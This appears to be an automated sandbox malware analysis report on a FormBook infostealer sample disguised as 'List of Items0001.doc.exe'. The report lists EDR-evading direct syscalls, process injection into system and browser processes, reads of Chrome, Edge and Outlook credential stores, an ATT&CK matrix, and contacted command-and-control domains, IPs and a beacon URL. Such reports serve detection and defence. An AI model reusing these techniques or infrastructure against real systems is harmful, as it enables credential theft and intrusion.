        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326814C9 mov eax, dword ptr fs:[00000030h]3_2_326814C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326814C9 mov eax, dword ptr fs:[00000030h]3_2_326814C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326814C9 mov eax, dword ptr fs:[00000030h]3_2_326814C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326814C9 mov eax, dword ptr fs:[00000030h]3_2_326814C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F4D0 mov eax, dword ptr fs:[00000030h]3_2_3268F4D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326844D1 mov eax, dword ptr fs:[00000030h]3_2_326844D1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326844D1 mov eax, dword ptr fs:[00000030h]3_2_326844D1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326944A8 mov eax, dword ptr fs:[00000030h]3_2_326944A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326624A2 mov eax, dword ptr fs:[00000030h]3_2_326624A2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326624A2 mov ecx, dword ptr fs:[00000030h]3_2_326624A2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326ED4A0 mov ecx, dword ptr fs:[00000030h]3_2_326ED4A0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326ED4A0 mov eax, dword ptr fs:[00000030h]3_2_326ED4A0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326ED4A0 mov eax, dword ptr fs:[00000030h]3_2_326ED4A0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E4BC mov eax, dword ptr fs:[00000030h]3_2_3269E4BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32660485 mov ecx, dword ptr fs:[00000030h]3_2_32660485
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269648A mov eax, dword ptr fs:[00000030h]3_2_3269648A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269648A mov eax, dword ptr fs:[00000030h]3_2_3269648A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269648A mov eax, dword ptr fs:[00000030h]3_2_3269648A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269B490 mov eax, dword ptr fs:[00000030h]3_2_3269B490
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269B490 mov eax, dword ptr fs:[00000030h]3_2_3269B490
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EC490 mov eax, dword ptr fs:[00000030h]3_2_326EC490
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267C560 mov eax, dword ptr fs:[00000030h]3_2_3267C560
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267E547 mov eax, dword ptr fs:[00000030h]3_2_3267E547
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A553 mov eax, dword ptr fs:[00000030h]3_2_3272A553
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32696540 mov eax, dword ptr fs:[00000030h]3_2_32696540
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32698540 mov eax, dword ptr fs:[00000030h]3_2_32698540
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266754C mov eax, dword ptr fs:[00000030h]3_2_3266754C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266254C mov eax, dword ptr fs:[00000030h]3_2_3266254C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B55F mov eax, dword ptr fs:[00000030h]3_2_3273B55F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B55F mov eax, dword ptr fs:[00000030h]3_2_3273B55F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269F523 mov eax, dword ptr fs:[00000030h]3_2_3269F523

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtMapViewOfSection: Direct from: 0x77252C3CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtAllocateVirtualMemory: Direct from: 0x77252B1CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtResumeThread: Direct from: 0x772535CCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtReadFile: Direct from: 0x772529FCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQuerySystemInformation: Direct from: 0x77252D1CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtNotifyChangeKey: Direct from: 0x77253B4CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtWriteVirtualMemory: Direct from: 0x77252D5CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtClose: Direct from: 0x77252A8C
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtCreateKey: Direct from: 0x77252B8CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtSetInformationThread: Direct from: 0x77252A6CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtWriteVirtualMemory: Direct from: 0x7725482CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtAllocateVirtualMemory: Direct from: 0x7725480CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtSetInformationThread: Direct from: 0x77246319Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQueryInformationProcess: Direct from: 0x77252B46Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtResumeThread: Direct from: 0x77252EDCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtCreateUserProcess: Direct from: 0x7725363CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtProtectVirtualMemory: Direct from: 0x77252EBCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtDelayExecution: Direct from: 0x77252CFCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtOpenKeyEx: Direct from: 0x77252ABCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtCreateFile: Direct from: 0x77252F0CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQueryVolumeInformationFile: Direct from: 0x77252E4CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtDeviceIoControlFile: Direct from: 0x77252A0CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQuerySystemInformation: Direct from: 0x772547ECJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtAllocateVirtualMemory: Direct from: 0x77252B0CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtOpenSection: Direct from: 0x77252D2CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQueryAttributesFile: Direct from: 0x77252D8CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtSetInformationProcess: Direct from: 0x77252B7CJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtTerminateThread: Direct from: 0x77252EECJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtReadVirtualMemory: Direct from: 0x77252DACJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtProtectVirtualMemory: Direct from: 0x77247A4EJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtOpenFile: Direct from: 0x77252CECJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtAllocateVirtualMemory: Direct from: 0x77253BBCJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeNtQueryInformationToken: Direct from: 0x77252BCCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: NULL target: C:\Windows\SysWOW64\TapiUnattend.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\TapiUnattend.exeThread register set: target process: 7320Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\TapiUnattend.exeThread APC queued: target process: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: MzAJhEkohQv.exe, 00000004.00000000.674131435485.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678884423351.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000000.674273505654.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ^Program Managera
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndR
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1516506 Sample: List of Items0001.doc.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 33 www.onetoph.xyz 2->33 35 www.moritynomxd.xyz 2->35 37 24 other IPs or domains 2->37 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 57 6 other signatures 2->57 10 List of Items0001.doc.exe 32 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 35->55 process4 file5 31 C:\Users\user\AppData\Local\...\System.dll, PE32 10->31 dropped 13 List of Items0001.doc.exe 6 10->13         started        process6 dnsIp7 45 wamuk.org 162.213.195.46, 443, 49892 NODISTOUS United States 13->45 69 Maps a DLL or memory area into another process 13->69 17 MzAJhEkohQv.exe 13->17 injected signatures8 process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 TapiUnattend.exe 13 17->20         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 20->59 61 Tries to harvest and steal browser information (history, passwords, etc) 20->61 63 Modifies the context of a thread in another process (thread injection) 20->63 65 3 other signatures 20->65 23 MzAJhEkohQv.exe 20->23 injected 27 explorer.exe 42 1 20->27 injected 29 firefox.exe 20->29         started        process13 dnsIp14 39 www.onetoph.xyz 209.74.95.29, 49898, 49899, 49900 MULTIBAND-NEWHOPEUS United States 23->39 41 www.moritynomxd.xyz 172.81.61.224, 49910, 49911, 49912 ESITEDUS United States 23->41 43 10 other IPs or domains 23->43 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        List of Items0001.doc.exe10%VirustotalBrowse
        List of Items0001.doc.exe13%ReversingLabs
        List of Items0001.doc.exe100%AviraHEUR/AGEN.1331791

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        wamuk.org0%VirustotalBrowse
        chalet-tofane.net8%VirustotalBrowse
        rmgltd.services0%VirustotalBrowse
        tracy.club1%VirustotalBrowse
        wdcb30.top0%VirustotalBrowse
        wdeb18.top0%VirustotalBrowse
        www.prj81oqde1.buzz1%VirustotalBrowse
        inf30027group23.xyz2%VirustotalBrowse
        www.wdeb18.top2%VirustotalBrowse
        www.useanecdotenow.tech0%VirustotalBrowse
        www.leadlikeyoumeanit.xyz0%VirustotalBrowse
        www.52ywq.vip0%VirustotalBrowse
        www.inf30027group23.xyz3%VirustotalBrowse
        www.chalet-tofane.net2%VirustotalBrowse
        www.mfgarage.net0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
        https://api.msn.com/sp:0%Avira URL Cloudsafe
        https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        https://cdn.jsdelivr.net/npm/bootstrap0%VirustotalBrowse
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
        http://crl.microsoft0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?~0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
        http://crl.microsoft0%VirustotalBrowse
        https://api.msn.com/v1/news/Feed/Windows?~0%VirustotalBrowse
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.new-wellness.net0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%VirustotalBrowse
        https://assets.msn.com/0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%VirustotalBrowse
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://assets.msn.0%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%VirustotalBrowse
        http://www.inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%VirustotalBrowse
        https://api.msn.com/sports/blended?market=en-us&satoriid=02bd0%Avira URL Cloudsafe
